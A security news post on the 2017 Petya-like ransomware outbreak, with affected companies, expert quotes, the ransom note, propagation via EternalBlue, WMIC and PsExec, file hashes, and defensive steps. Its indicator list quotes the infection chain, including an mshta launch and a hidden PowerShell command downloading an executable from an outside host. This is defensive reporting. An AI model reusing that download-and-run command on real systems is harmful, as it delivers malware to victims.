Companies in the UK, USA, India and across Europe are reported to have been infected with the widely-reported ransomware.
While security companies researched and they claim that this is not the Petya variant, as reported earlier by companies, but instead is a brand new variant, companies including US pharmaceutical Merck, law firm DLA Piper and a hospital in Pittsburgh, and UK digital advertising firm WPP are among those who have been affected.
Becky Pinkard, vice president of service delivery and intelligence at Digital Shadows, said: “There is some confusion over the origins and nature of Petya, with some reports suggesting there are similarities to WannaCry and that it utilizes the EternalBlue SMBv1 worm functionality. More work is needed to investigate the way the virus propagates; in the meantime businesses are urged to ensure their software is up-to-date and all files backed up.”
Affected systems are displaying this message:
“Ooops, your important files are encrypted.
“If you see this text, then your files are no longer accessible, because they have been encrypted. Perhaps you are busy looking for a way to recover your files, but don’t waste your time. Nobody can recover your files without our decryption service.
“We guarantee that you can recover all your files safely and easily. All you need to do is submit the payment and purchase the decryption key.”
At the time of writing, the Bitcoin wallet associated with this attack showed 42 payments had been made; all of these were made from 27th June.
Brian Hussey, VP of cyber threat detection and response at Trustwave, said: “This version is a much more advanced approach that requires a sophisticated skillset in programming and truly renders everything on the victim’s computer fully inaccessible. It does not just encrypt user files on the existing Operating System, rather it launches a custom bootloader that encrypts the Master File Table and the Master Boot Record, as well as system files. It restarts the computer and launches directly into the Petya bootloader, thereby cutting any access to the Operating System (or any files) at all, until the ransom is paid and the computer can go back to booting normally.
“Original versions of Petya released in 2016 showed programming errors that allowed a security analyst to decode the ransomed files. This issue was fixed in recent versions of the malware and we wouldn’t expect this to be present in current versions”
However researchers said that its preliminary findings suggested that it is not Petya. It said: “This appears to be a complex attack which involves several attack vectors. We can confirm that a modified EternalBlue exploit is used for propagation at least within the corporate network.”
In terms of how it infected business, early analysis suggested that it uses a combination of the EternalBlue vulnerability that was used for the WannaCry ransomware in May, as well as Windows Management Instrumentation Command-line (WMIC) and the PsExec tool.
Also, it was reported that Posteo administrators have disconnected the email address associated with paying the ransomware. Pinkard said: “This means that if anyone paying the ransom to unencrypt their files tries to do so, the criminals who distributed the attack are unable to access the bitcoin account the ransom goes to; so they will not be able to release the keys for the encrypted files – even if they ever intended to do so.”
Please be careful , watch your email/attachments. Keep your defense tools updated.
1. Block smb & wmi port 135,445,1024-1035 TCP
2. Avoid reboot! shutdown -a
Mechanisms – similarly to WannaCry is uses MS17-010. Crypt logic – once activated it will reboot the system (delayed), the it runs fake chkdsk and victim gets the ransomware request. And system boot stops. It encrypts MBR as it was done with earlier Petya Ransomware.
– – – – – – – – – – – – – – – – – – – – – – – –
File Name Order-20062017.doc (actually RTF with CVE-2017-0199)
MD5 Hash Identifier 415FE69BF32634CA98FA07633F4118E1
SHA-1 Hash Identifier 101CC1CB56C407D5B9149F2C3B8523350D23BA84
SHA-256 Hash Identifier FE2E5D0543B4C8769E401EC216D78A5A3547DFD426FD47E097DF04A5F7D6D206
File Size 6215 bytes
File Type Rich Text Format data
h11p://220.127.116.11/myguy.xls (actually HTA)
File Name myguy.xls
MD5 Hash Identifier 0487382A4DAF8EB9660F1C67E30F8B25
SHA-1 Hash Identifier 736752744122A0B5EE4B95DDAD634DD225DC0F73
SHA-256 Hash Identifier EE29B9C01318A1E23836B949942DB14D4811246FDAE2F41DF9F0DCD922C63BC6
File Size 13893 bytes
File Type Zip archive data
mshta.exe %WINDIR%\System32\mshta.exe” “C:\myguy.xls.hta” ” (PID: 2324)
powershell.exe -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile(‘h11p://french-cooking.com/myguy.exe’, ‘%APPDATA%\10807.exe’);” (PID: 2588, Additional Context: ( System.Net.WebClient).DownloadFile(‘h11p://french-cooking.com/myguy.exe’, ‘%APPDATA%\10807.exe’)
10807.exe %APPDATA%\10807.exe” ” (PID: 3096)
File Name BCA9D6.exe
MD5 Hash Identifier A1D5895F85751DFE67D19CCCB51B051A
SHA-1 Hash Identifier 9288FB8E96D419586FC8C595DD95353D48E8A060
SHA-256 Hash Identifier 17DACEDB6F0379A65160D73C0AE3AA1F03465AE75CB6AE754C7DCB3017AF1FBD
File Size 275968 bytes
1) Check logs for IOCs above
2) Use gPO to block the ports 135, 445, 1024-1035 TCP
3) Avoid the system reboot (cmd /k shutdown -a)
4) Try not to format the encrypted systems but rather get its image
5) Block execution of .exe within %AppData% and %Temp%